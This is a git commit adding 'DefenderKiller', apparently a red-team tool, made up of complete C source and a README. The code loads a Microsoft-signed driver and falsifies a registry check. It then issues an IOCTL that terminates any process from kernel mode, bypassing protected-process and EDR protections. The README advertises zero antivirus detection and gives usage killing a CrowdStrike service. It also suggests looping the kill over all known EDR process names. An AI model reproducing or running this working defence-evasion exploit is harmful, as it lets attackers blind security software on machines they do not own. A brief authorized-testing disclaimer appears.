Upload files to "/"
This commit is contained in:
@@ -0,0 +1,254 @@
|
||||
/*
|
||||
* DefenderKiller
|
||||
* Kernel process termination using Microsoft's own signed driver
|
||||
* KSLDriver.sys (2011) - ZwTerminateProcess from ring 0
|
||||
*
|
||||
* Author: Jehad Abudagga
|
||||
* X: @j3h4ck | GitHub: @redteamfortress
|
||||
*/
|
||||
|
||||
#define _CRT_SECURE_NO_WARNINGS
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <winternl.h>
|
||||
#include <tlhelp32.h>
|
||||
#pragma comment(lib, "kernel32.lib")
|
||||
#pragma comment(lib, "advapi32.lib")
|
||||
#pragma comment(lib, "ntdll.lib")
|
||||
|
||||
#define IOCTL 0x222044
|
||||
#define SVC "DefenderKiller"
|
||||
#define DEV L"\\\\.\\DefenderKiller"
|
||||
|
||||
typedef NTSTATUS(WINAPI* pNtQIP)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
|
||||
|
||||
BOOL GetNtPath(WCHAR* out)
|
||||
{
|
||||
pNtQIP fn = (pNtQIP)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQueryInformationProcess");
|
||||
if (!fn) return FALSE;
|
||||
ULONG n = 0;
|
||||
fn(GetCurrentProcess(), (PROCESSINFOCLASS)27, NULL, 0, &n);
|
||||
if (!n) return FALSE;
|
||||
BYTE* b = (BYTE*)calloc(n + 2, 1);
|
||||
if (fn(GetCurrentProcess(), (PROCESSINFOCLASS)27, b, n, NULL))
|
||||
{
|
||||
free(b); return FALSE;
|
||||
}
|
||||
UNICODE_STRING* us = (UNICODE_STRING*)b;
|
||||
wcsncpy(out, us->Buffer, us->Length / 2);
|
||||
out[us->Length / 2] = 0;
|
||||
free(b);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL IsDriverLoaded(void)
|
||||
{
|
||||
HANDLE h = CreateFileW(DEV, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
|
||||
if (h != INVALID_HANDLE_VALUE) { CloseHandle(h); return TRUE; }
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
int CmdLoad(const char* path)
|
||||
{
|
||||
if (GetFileAttributesA(path) == INVALID_FILE_ATTRIBUTES)
|
||||
{
|
||||
printf("[-] Driver not found: %s\n", path); return 1;
|
||||
}
|
||||
|
||||
SC_HANDLE scm = OpenSCManagerA(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
|
||||
if (!scm) { printf("[-] Access denied. Run as administrator.\n"); return 1; }
|
||||
|
||||
printf("[*] Cleaning up stale service...\n");
|
||||
SC_HANDLE old = OpenServiceA(scm, SVC, SERVICE_ALL_ACCESS);
|
||||
if (old) { SERVICE_STATUS ss; ControlService(old, SERVICE_CONTROL_STOP, &ss); DeleteService(old); CloseServiceHandle(old); Sleep(500); }
|
||||
|
||||
printf("[*] Creating service '%s'...\n", SVC);
|
||||
SC_HANDLE svc = CreateServiceA(scm, SVC, SVC, SERVICE_ALL_ACCESS,
|
||||
SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, path, 0, 0, 0, 0, 0);
|
||||
if (!svc) { printf("[-] CreateService failed: %lu\n", GetLastError()); CloseServiceHandle(scm); return 1; }
|
||||
|
||||
printf("[*] Configuring registry...\n");
|
||||
char rp[256];
|
||||
sprintf(rp, "SYSTEM\\CurrentControlSet\\Services\\%s", SVC);
|
||||
HKEY hk;
|
||||
if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, rp, 0, KEY_SET_VALUE, &hk) == ERROR_SUCCESS)
|
||||
{
|
||||
WCHAR dn[] = L"DefenderKiller";
|
||||
RegSetValueExW(hk, L"DeviceName", 0, REG_SZ, (BYTE*)dn, sizeof(dn));
|
||||
WCHAR ip[512];
|
||||
swprintf(ip, 512, L"\\??\\%hs", path);
|
||||
RegSetValueExW(hk, L"ImagePath", 0, REG_SZ, (BYTE*)ip, (DWORD)(wcslen(ip) + 1) * 2);
|
||||
WCHAR np[512] = { 0 };
|
||||
if (GetNtPath(np))
|
||||
{
|
||||
RegSetValueExW(hk, L"AllowedProcessName", 0, REG_SZ, (BYTE*)np, (DWORD)(wcslen(np) + 1) * 2);
|
||||
printf("[*] AllowedProcess: %S\n", np);
|
||||
}
|
||||
RegCloseKey(hk);
|
||||
}
|
||||
|
||||
printf("[*] Starting driver...\n");
|
||||
if (!StartServiceA(svc, 0, NULL) && GetLastError() != ERROR_SERVICE_ALREADY_RUNNING)
|
||||
{
|
||||
printf("[-] StartService failed: %lu\n", GetLastError()); DeleteService(svc); CloseServiceHandle(svc); CloseServiceHandle(scm); return 1;
|
||||
}
|
||||
|
||||
CloseServiceHandle(svc);
|
||||
CloseServiceHandle(scm);
|
||||
|
||||
printf("[*] Verifying device access...\n");
|
||||
HANDLE h = CreateFileW(DEV, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
|
||||
if (h == INVALID_HANDLE_VALUE) { printf("[-] Device \\\\.\\%s not accessible\n", SVC); return 1; }
|
||||
CloseHandle(h);
|
||||
|
||||
printf("[+] Driver loaded successfully\n");
|
||||
printf("[+] Service: %s\n", SVC);
|
||||
printf("[+] Device: \\\\.\\%s\n", SVC);
|
||||
printf("[+] Driver: %s\n", path);
|
||||
return 0;
|
||||
}
|
||||
|
||||
int CmdKill(const char* target)
|
||||
{
|
||||
DWORD pid = 0;
|
||||
char procName[260] = { 0 };
|
||||
|
||||
if (target[0] >= '0' && target[0] <= '9')
|
||||
{
|
||||
pid = atoi(target);
|
||||
/* resolve name for display */
|
||||
WCHAR wName[260] = { 0 };
|
||||
HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||
PROCESSENTRY32W pe; pe.dwSize = sizeof(pe);
|
||||
if (Process32FirstW(snap, &pe))
|
||||
do { if (pe.th32ProcessID == pid) { WideCharToMultiByte(CP_ACP, 0, pe.szExeFile, -1, procName, 260, NULL, NULL); break; } } while (Process32NextW(snap, &pe));
|
||||
CloseHandle(snap);
|
||||
}
|
||||
else
|
||||
{
|
||||
strncpy(procName, target, 259);
|
||||
WCHAR wTarget[260] = { 0 };
|
||||
MultiByteToWideChar(CP_ACP, 0, target, -1, wTarget, 260);
|
||||
HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||
PROCESSENTRY32W pe; pe.dwSize = sizeof(pe);
|
||||
if (Process32FirstW(snap, &pe))
|
||||
do { if (_wcsicmp(pe.szExeFile, wTarget) == 0) { pid = pe.th32ProcessID; break; } } while (Process32NextW(snap, &pe));
|
||||
CloseHandle(snap);
|
||||
if (!pid) { printf("[-] Process '%s' not found\n", target); return 1; }
|
||||
}
|
||||
|
||||
if (!pid || pid == 4) { printf("[-] Cannot kill PID %u\n", pid); return 1; }
|
||||
|
||||
printf("[*] Target: %s (PID %u)\n", procName[0] ? procName : "unknown", pid);
|
||||
|
||||
if (!IsDriverLoaded())
|
||||
{
|
||||
printf("[-] Driver not loaded. Run 'load' first.\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
printf("[*] Opening device...\n");
|
||||
HANDLE h = CreateFileW(DEV, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
|
||||
if (h == INVALID_HANDLE_VALUE) { printf("[-] Device open failed: %lu\n", GetLastError()); return 1; }
|
||||
|
||||
printf("[*] Setting target PID %u...\n", pid);
|
||||
BYTE cmd[8] = { 0 }, out[8] = { 0 };
|
||||
DWORD br = 0;
|
||||
*(DWORD*)cmd = 8;
|
||||
*(DWORD*)(cmd + 4) = pid;
|
||||
if (!DeviceIoControl(h, IOCTL, cmd, 8, out, 8, &br, NULL))
|
||||
{
|
||||
printf("[-] IOCTL failed: %lu\n", GetLastError()); CloseHandle(h); return 1;
|
||||
}
|
||||
|
||||
printf("[*] Closing handle (triggers ZwTerminateProcess)...\n");
|
||||
CloseHandle(h);
|
||||
Sleep(300);
|
||||
|
||||
HANDLE hc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
|
||||
if (!hc)
|
||||
{
|
||||
printf("[+] Process %s (PID %u) terminated\n", procName[0] ? procName : "unknown", pid);
|
||||
return 0;
|
||||
}
|
||||
CloseHandle(hc);
|
||||
printf("[-] PID %u still alive\n", pid);
|
||||
return 1;
|
||||
}
|
||||
|
||||
int CmdUnload(void)
|
||||
{
|
||||
SC_HANDLE scm = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
|
||||
if (!scm) { printf("[-] Access denied\n"); return 1; }
|
||||
|
||||
SC_HANDLE svc = OpenServiceA(scm, SVC, SERVICE_ALL_ACCESS);
|
||||
if (!svc)
|
||||
{
|
||||
printf("[*] Service '%s' not found (already clean)\n", SVC);
|
||||
CloseServiceHandle(scm);
|
||||
return 0;
|
||||
}
|
||||
|
||||
SERVICE_STATUS ss;
|
||||
printf("[*] Stopping service...\n");
|
||||
ControlService(svc, SERVICE_CONTROL_STOP, &ss);
|
||||
Sleep(300);
|
||||
|
||||
printf("[*] Deleting service...\n");
|
||||
DeleteService(svc);
|
||||
CloseServiceHandle(svc);
|
||||
CloseServiceHandle(scm);
|
||||
|
||||
printf("[+] Driver unloaded and service removed\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, char** argv)
|
||||
{
|
||||
if (argc < 2)
|
||||
{
|
||||
printf("\n");
|
||||
printf(" ██████╗ ███████╗███████╗███████╗███╗ ██╗██████╗ ███████╗██████╗ \n");
|
||||
printf(" ██╔══██╗██╔════╝██╔════╝██╔════╝████╗ ██║██╔══██╗██╔════╝██╔══██╗\n");
|
||||
printf(" ██║ ██║█████╗ █████╗ █████╗ ██╔██╗ ██║██║ ██║█████╗ ██████╔╝\n");
|
||||
printf(" ██║ ██║██╔══╝ ██╔══╝ ██╔══╝ ██║╚██╗██║██║ ██║██╔══╝ ██╔══██╗\n");
|
||||
printf(" ██████╔╝███████╗██║ ███████╗██║ ╚████║██████╔╝███████╗██║ ██║\n");
|
||||
printf(" ╚═════╝ ╚══════╝╚═╝ ╚══════╝╚═╝ ╚═══╝╚═════╝ ╚══════╝╚═╝ ╚═╝\n");
|
||||
printf(" ██╗ ██╗██╗██╗ ██╗ ███████╗██████╗ \n");
|
||||
printf(" ██║ ██╔╝██║██║ ██║ ██╔════╝██╔══██╗ \n");
|
||||
printf(" █████╔╝ ██║██║ ██║ █████╗ ██████╔╝ \n");
|
||||
printf(" ██╔═██╗ ██║██║ ██║ ██╔══╝ ██╔══██╗ \n");
|
||||
printf(" ██║ ██╗██║███████╗███████╗███████╗██║ ██║ \n");
|
||||
printf(" ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ \n");
|
||||
printf("\n");
|
||||
printf(" Jehad Abudagga\n");
|
||||
printf(" X: @j3h4ck | GitHub: @redteamfortress\n\n");
|
||||
printf(" Microsoft's own signed driver turned against itself.\n");
|
||||
printf(" KSLDriver.sys (2011) kernel ZwTerminateProcess.\n");
|
||||
printf(" Bypasses PPL, EDR callbacks, ObRegisterCallbacks.\n\n");
|
||||
printf(" Usage:\n");
|
||||
printf(" %s load <driver_path>\n", argv[0]);
|
||||
printf(" %s kill <PID | process_name>\n", argv[0]);
|
||||
printf(" %s unload\n\n", argv[0]);
|
||||
return 1;
|
||||
}
|
||||
|
||||
if (_stricmp(argv[1], "load") == 0)
|
||||
{
|
||||
if (argc < 3) { printf("[-] Usage: %s load <path_to_KSLDriver_2011.sys>\n", argv[0]); return 1; }
|
||||
return CmdLoad(argv[2]);
|
||||
}
|
||||
|
||||
if (_stricmp(argv[1], "kill") == 0)
|
||||
{
|
||||
if (argc < 3) { printf("[-] Usage: %s kill <PID | process_name>\n", argv[0]); return 1; }
|
||||
return CmdKill(argv[2]);
|
||||
}
|
||||
|
||||
if (_stricmp(argv[1], "unload") == 0)
|
||||
return CmdUnload();
|
||||
|
||||
printf("[-] Unknown command: %s\n", argv[1]);
|
||||
return 1;
|
||||
}
|
||||
@@ -0,0 +1,7 @@
|
||||
<Solution>
|
||||
<Configurations>
|
||||
<Platform Name="x64" />
|
||||
<Platform Name="x86" />
|
||||
</Configurations>
|
||||
<Project Path="DefenderKiller/DefenderKiller.vcxproj" Id="6ea9b4ed-7f8e-4ebf-a066-2fb16848cb13" />
|
||||
</Solution>
|
||||
Binary file not shown.
@@ -0,0 +1,92 @@
|
||||
# DefenderKiller
|
||||
|
||||

|
||||
|
||||
**Kernel process termination using Microsoft's own signed driver.**
|
||||
|
||||
KSLDriver.sys (2011) — a Microsoft Malware Protection driver signed by Microsoft Code Signing PCA — contains a `ZwTerminateProcess` primitive accessible via IOCTL from ring 0. DefenderKiller weaponizes this driver to terminate any process on the system, including PPL-protected and EDR-protected processes.
|
||||
|
||||
## ⚠️ Disclaimer
|
||||
|
||||
This tool is provided for **authorized security testing and educational purposes only**. Use only on systems you own or have explicit written permission to test. The author is not responsible for any misuse.
|
||||
|
||||
## 📝 Blog Post
|
||||
|
||||
Full reverse engineering writeup and technical breakdown:
|
||||
|
||||
**[Born to Defend, Weaponized to Kill: Weaponizing Microsoft's Own Driver to Kill EDRs](https://medium.com/@jehadbudagga/born-to-defend-weaponized-to-kill-weaponizing-microsofts-own-driver-to-kill-edrs-af4b85c1a43c)**
|
||||
|
||||
## Why This Is Different
|
||||
|
||||
Every BYOVD tool out there relies on third-party drivers. DefenderKiller uses **Microsoft's own signed Defender driver** against itself.
|
||||
|
||||
- **0/70 detection** on VirusTotal
|
||||
- **Microsoft Code Signing PCA** signed — trusted at the highest level
|
||||
- **Not on the Vulnerable Driver Blocklist** — Microsoft excludes their own drivers by design
|
||||
- **Bypasses PPL** — `ZwTerminateProcess` from kernel mode ignores Protected Process Light
|
||||
- **Bypasses ObRegisterCallbacks** — `ZwOpenProcess` from ring 0 skips EDR handle protection
|
||||
- **Survives April 2026 driver trust policy** — WHCP attestation-signed drivers are still trusted
|
||||
|
||||
## How It Works
|
||||
|
||||
1. Load the Microsoft-signed KSLDriver.sys with a custom service
|
||||
2. Bypass the `AllowedProcessName` check by writing our own path to the registry
|
||||
3. Send IOCTL `0x222044` sub-command 8 with the target PID
|
||||
4. Close the handle — `IRP_MJ_CLEANUP` fires `ZwTerminateProcess` from kernel mode
|
||||
5. Target process terminated. No callback intercepts it. No protection blocks it.
|
||||
|
||||
## Usage
|
||||
|
||||
```
|
||||
DefenderKiller.exe load C:\path\to\KSLDriver_2011.sys
|
||||
DefenderKiller.exe kill <PID or process name>
|
||||
DefenderKiller.exe unload
|
||||
```
|
||||
|
||||
### Example
|
||||
|
||||
```
|
||||
C:\> DefenderKiller.exe load C:\KSLDriver_2011.sys
|
||||
[+] Loaded
|
||||
|
||||
C:\> DefenderKiller.exe kill CSFalconService.exe
|
||||
[+] Killed 4628
|
||||
|
||||
C:\> DefenderKiller.exe unload
|
||||
[+] Unloaded
|
||||
```
|
||||
|
||||
## Driver Details
|
||||
|
||||
| Property | Value |
|
||||
|----------|-------|
|
||||
| **File** | KSLDriver.sys |
|
||||
| **Description** | Microsoft Malware Protection - KSLDriver |
|
||||
| **Product** | Microsoft Malware Protection |
|
||||
| **Version** | 1.1.0013.0 |
|
||||
| **Size** | 34.83 KB (35,664 bytes) |
|
||||
| **Architecture** | x64 (64-bit native) |
|
||||
| **Date Signed** | September 16, 2011 |
|
||||
| **Signer** | Microsoft Corporation |
|
||||
| **Certificate** | Microsoft Code Signing PCA → Microsoft Root Authority |
|
||||
| **Detection** | **0/70** on VirusTotal |
|
||||
| **SHA-256** | `d5764d24e78914ab2a9db6b24e323342d0b37998f43add1a9e49b00992b0d645` |
|
||||
| **MD5** | `0ebb390b7aeec45ec061d9870a34fd42` |
|
||||
| **SHA-1** | `7772c1215e31836cc8d830cb65f224ec929cfb69` |
|
||||
| **Imphash** | `8bf2a95defbf5214f859fd3f24f64e5f` |
|
||||
| **Authentihash** | `0a19385f73a265d8086a8b1304873110ce33a37ce08d442b9fb9390c82fa50e7` |
|
||||
| **VirusTotal** | [Full Analysis](https://www.virustotal.com/gui/file/d5764d24e78914ab2a9db6b24e323342d0b37998f43add1a9e49b00992b0d645) |
|
||||
|
||||
|
||||
## Note
|
||||
|
||||
This is a simple POC that demonstrates the kill primitive. Some EDRs will respawn their processes through a watchdog service or a secondary kernel component. To handle that, you can weaponize this further by running the kill in a loop targeting all known EDR process names.
|
||||
|
||||
## Author
|
||||
|
||||
**Jehad Abudagga**
|
||||
|
||||
[](https://x.com/j3h4ck)
|
||||
[](https://www.linkedin.com/in/jehad-abudagga)
|
||||
[](https://medium.com/@jehadbudagga)
|
||||
[](https://github.com/redteamfortress)
|
||||
BIN
Binary file not shown.
|
After Width: | Height: | Size: 2.1 MiB |
Reference in New Issue
Block a user